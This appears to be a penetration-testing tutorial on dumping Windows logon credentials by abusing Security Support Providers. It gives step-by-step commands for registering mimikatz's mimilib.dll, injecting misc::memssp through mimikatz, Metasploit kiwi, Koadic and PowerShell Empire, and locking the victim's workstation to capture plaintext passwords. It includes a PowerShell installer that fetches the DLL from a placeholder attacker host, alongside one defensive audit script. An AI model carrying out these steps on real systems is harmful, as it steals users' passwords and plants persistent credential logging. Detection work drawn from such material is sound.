Credential Dumping Security
Introduction to Security Support Provider
A Security Support Provider (SSP) is a DLL that implements one or more security packages (Kerberos, NTLM, Digest, Schannel and so on) behind the Security Support Provider Interface (SSPI), the API that Windows applications and the Windows logon process use for authentication. The Local Security Authority process (LSASS) loads every registered SSP when the system starts, so a registered DLL runs inside LSASS and sees the credentials that flow through Windows logon. The list of packages LSASS loads is stored as a REG_MULTI_SZ value named Security Packages under two registry keys:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages
Manual
The first method abuses SSP registration by hand: mimikatz's mimilib.dll is registered as a security package so that LSASS loads it at the next reboot. From then on, every time a user logs on, mimilib appends that user's credentials in plaintext to a log file named kiwissp.log in the System32 directory. The registration itself lives in the registry under hklm\system\currentcontrolset\control\lsa; the log file does not.
The first step is to copy mimilib.dll from the mimikatz release folder (use the build that matches the target's architecture, x64 on 64-bit Windows) into the System32 folder. This DLL is what creates kiwissp.log and writes the captured credentials into it in plaintext.
Then navigate to hklm\system\currentcontrolset\control\lsa in the registry editor. On a default installation you will find that Security Packages has no entries, as shown in the image below:
The same can be checked from a PowerShell prompt by querying that value (shown in the image below). As the image shows, there is no entry, so this needs to change before LSASS will load mimilib. The value is a multi-string: it can list the built-in packages LSASS already manages (Kerberos, wdigest and so on) followed by mimilib, which is the entry that matters. The command shown in the image below writes these entries; a second query of the value, also shown below, confirms they were written.
You can then navigate again to hklm\system\currentcontrolset\control\lsa in the registry editor and see the entries you just made.
From the next reboot on, LSASS loads mimilib, and each subsequent user logon writes that user's credentials in cleartext to kiwissp.log in System32. Use the following command to read them:
type C:\Windows\System32\kiwissp.log
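The following PowerShell audit is an added example (not part of the original article) that checks the registration points the manual method above modifies: it lists every entry in both Security Packages values, resolves each to its DLL in System32, checks the DLL's Authenticode signature, and reports whether the kiwissp.log / mimilsa.log artifacts exist. It assumes an elevated prompt on a Windows host with the standard LSA registry layout; a package whose DLL is missing or not Microsoft-signed (mimilib.dll is not) is flagged as suspicious.

```powershell
# Added example: audit LSA "Security Packages" for unexpected SSP DLLs and look for
# the log files that mimilib (kiwissp.log) and misc::memssp (mimilsa.log) write.
# Run from an elevated PowerShell prompt.

$LsaKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
)
$System32 = Join-Path $env:SystemRoot 'System32'

function Get-SspPackageStatus {
    # One object per package name listed in each "Security Packages" REG_MULTI_SZ value.
    foreach ($key in $LsaKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        # Entries are DLL base names without extension, e.g. "kerberos" or "mimilib";
        # a fresh install may hold a single empty string, which is skipped here.
        $packages = @($props.'Security Packages') | Where-Object { -not [string]::IsNullOrEmpty($_) }
        foreach ($pkg in $packages) {
            $dll    = Join-Path $System32 "$pkg.dll"
            $exists = Test-Path $dll
            $status = 'Missing'
            $signer = $null
            if ($exists) {
                $sig    = Get-AuthenticodeSignature -FilePath $dll
                $status = $sig.Status.ToString()          # Valid / NotSigned / HashMismatch ...
                $signer = $sig.SignerCertificate.Subject  # $null when the file is unsigned
            }
            [pscustomobject]@{
                Key        = $key
                Package    = $pkg
                DllPath    = $dll
                Present    = $exists
                SigStatus  = $status
                Signer     = $signer
                # Built-in packages are Microsoft-signed; anything else deserves a look.
                Suspicious = (-not $exists) -or ($status -ne 'Valid') -or ($signer -notmatch 'Microsoft')
            }
        }
    }
}

function Get-CredentialLogArtifacts {
    # mimilib writes kiwissp.log, misc::memssp writes mimilsa.log, both into System32.
    foreach ($name in 'kiwissp.log', 'mimilsa.log') {
        $path = Join-Path $System32 $name
        if (Test-Path $path) {
            $item = Get-Item $path
            [pscustomobject]@{ File = $path; SizeBytes = $item.Length; LastWrite = $item.LastWriteTime }
        }
    }
}

Get-SspPackageStatus | Format-Table Key, Package, Present, SigStatus, Suspicious -AutoSize
$logs = Get-CredentialLogArtifacts
if ($logs) { $logs | Format-Table -AutoSize } else { "No kiwissp.log / mimilsa.log found in $System32." }
```

The registry check only catches the mimilib method; misc::memssp patches LSASS in memory and leaves no registry trace, so for that variant the log file check (and the LSASS tampering it implies) is what you have.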
Mimikatz
Mimikatz's misc::memssp module injects its credential-logging code directly into the running LSASS process, so the plaintext password of every user who logs on (or unlocks their session) from that point on is written to a log file. Unlike the mimilib method, nothing is written to the registry and the patch does not survive a reboot, but no reboot is needed either. Run mimikatz as an administrator and type:
privilege::debug
misc::memssp
Running the above commands creates a mimilsa.log file in System32 as soon as a user logs in. To read this file, use the following command:
type C:\Windows\System32\mimilsa.log
Metasploit Framework
When dumping credentials remotely, Metasploit really comes in handy. Its kiwi extension wraps mimikatz, so the same in-memory SSP patch can be applied from a meterpreter session. The session must run with administrative (ideally SYSTEM) privileges, and the meterpreter must match the host architecture (an x64 meterpreter on 64-bit Windows), otherwise kiwi will not load. Use load kiwi to initiate the extension, then inject the mimikatz patch into memory:
load kiwi
kiwi_cmd misc::memssp
The patch is now in place. Because the log file only receives credentials from logons that happen after the injection, lock the victim's workstation so that the user has to re-enter their password:
shell
RunDll32.exe user32.dll,LockWorkStation
This does not log the user out; it locks the session, and the next unlock goes through LSASS like a logon. Note that LockWorkStation only locks the desktop of the session it runs in, so the shell has to run in the logged-on user's session (migrate into one of that user's processes first if your meterpreter lives in session 0). Once the user unlocks, mimilsa.log is created in System32; read it with the following command:
Koadic
Just like Metasploit, Koadic ships a similar mimikatz implant, mimikatz_dynwrapx, which loads mimikatz in memory and runs a mimikatz command of your choice. Once you have a zombie (a Koadic session), set MIMICMD to misc::memssp and execute the implant:
use mimikatz_dynwrapx
set MIMICMD misc::memssp
execute
Once the implant has run successfully, open a command shell on the zombie and lock the workstation so the user has to sign in again; after they do, read the mimilsa file with the type command:
cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type C:\Windows\System32\mimilsa.log
PowerShell Empire
PowerShell Empire is an outstanding tool, which we have covered in a separate series of articles. Empire also wraps mimikatz, and its memssp module applies the same in-memory patch to retrieve Windows logon credentials. Once you have an agent, run the following post-exploitation module:
usemodule persistence/misc/memssp
execute
The module runs mimikatz's misc::memssp command on the agent's host.
After the module has executed successfully, all that is left is to lock the user out of their session so that, when they sign in again, their credentials land in the plaintext log file. To lock the workstation, use the following module:
usemodule management/lock
execute
After the user logs in again, the file is created. To read its contents, use the following command:
type C:\Windows\System32\mimilsa.log
PowerShell Empire: mimilib.dll
Everything the manual method did can also be done remotely through Empire, which is useful in external penetration testing. The first step is to get mimilib.dll from the mimikatz folder into the System32 folder on the target. Go to the folder holding mimilib.dll and start a simple HTTP server there, as shown in the following image (python -m SimpleHTTPServer is the Python 2 module; python3 -m http.server is its Python 3 equivalent):
ls
python -m SimpleHTTPServer
Then, from your agent's shell, run the set of shell commands shown in the image below:
Of the commands above, the first downloads mimilib.dll from the Python server you just started onto the target PC, and the other two write the Security Packages registry value for you. Once they have executed successfully, all that is left is to wait for the target system to restart; after the next user logon, kiwissp.log is created. To access the file, use the following command:
type C:\Windows\System32\kiwissp.log
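The following script is an added example (not the article's, Empire's or mimikatz's own commands) that carries out the mimilib.dll registration used by both the manual method earlier on this page and the Empire variant just described. It fetches the DLL from a listener such as the Python HTTP server above when a URL is given, otherwise copies it from a local mimikatz folder, appends mimilib to the Security Packages multi-string without clobbering existing entries, and reads kiwissp.log once a logon has occurred. It assumes an elevated PowerShell prompt on the target; the URL http://ATTACKER/mimilib.dll and the local path .\mimilib.dll are placeholders.

```powershell
# Added example: register mimilib.dll as an SSP (manual method / Empire mimilib.dll method).
# Assumes an elevated PowerShell prompt on the target. Placeholders: http://ATTACKER/mimilib.dll
# (the attacker's HTTP listener) and .\mimilib.dll (an unpacked mimikatz release folder).

$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$System32 = Join-Path $env:SystemRoot 'System32'
$Target   = Join-Path $System32 'mimilib.dll'

function Install-MimilibDll {
    param([string]$SourceUrl, [string]$LocalPath = '.\mimilib.dll')
    if ($SourceUrl) {
        # Remote variant: pull the DLL from the listener started on the attacking host.
        Invoke-WebRequest -Uri $SourceUrl -OutFile $Target -UseBasicParsing
    } else {
        # Manual variant: copy it from the mimikatz folder on the local machine.
        Copy-Item -Path $LocalPath -Destination $Target -Force
    }
    Get-Item $Target
}

function Add-SecurityPackage {
    param([string]$Name = 'mimilib')
    # "Security Packages" is REG_MULTI_SZ. Read it, drop empty elements, append the
    # package once, and write the whole list back so existing entries survive.
    $raw     = (Get-ItemProperty -Path $LsaKey -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
    $current = @(@($raw) | Where-Object { -not [string]::IsNullOrEmpty($_) })
    if ($current -contains $Name) { return $current }
    $updated = [string[]]($current + @($Name))
    Set-ItemProperty -Path $LsaKey -Name 'Security Packages' -Value $updated -Type MultiString
    # Read back to confirm the entry was written.
    (Get-ItemProperty -Path $LsaKey -Name 'Security Packages').'Security Packages'
}

function Get-KiwisspLog {
    # LSASS loads the package at the next boot; each interactive logon after that appends a line.
    $log = Join-Path $System32 'kiwissp.log'
    if (Test-Path $log) { Get-Content $log } else { "Not yet created: $log (reboot, then wait for a logon)" }
}

Install-MimilibDll                     # or: Install-MimilibDll -SourceUrl 'http://ATTACKER/mimilib.dll'
Add-SecurityPackage -Name 'mimilib'    # registers the SSP; takes effect after restart
Get-KiwisspLog
```

On current Windows builds the Lsa\Security Packages value is usually empty and the built-in packages are loaded regardless, so appending mimilib is the essential change; listing the built-in packages as well, as the article's registry entry does, does no harm. Removing the entry again is the same read-filter-write with the name dropped, plus deleting the DLL after a reboot, since LSASS holds it open while loaded.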
www.ignitetechnologies.in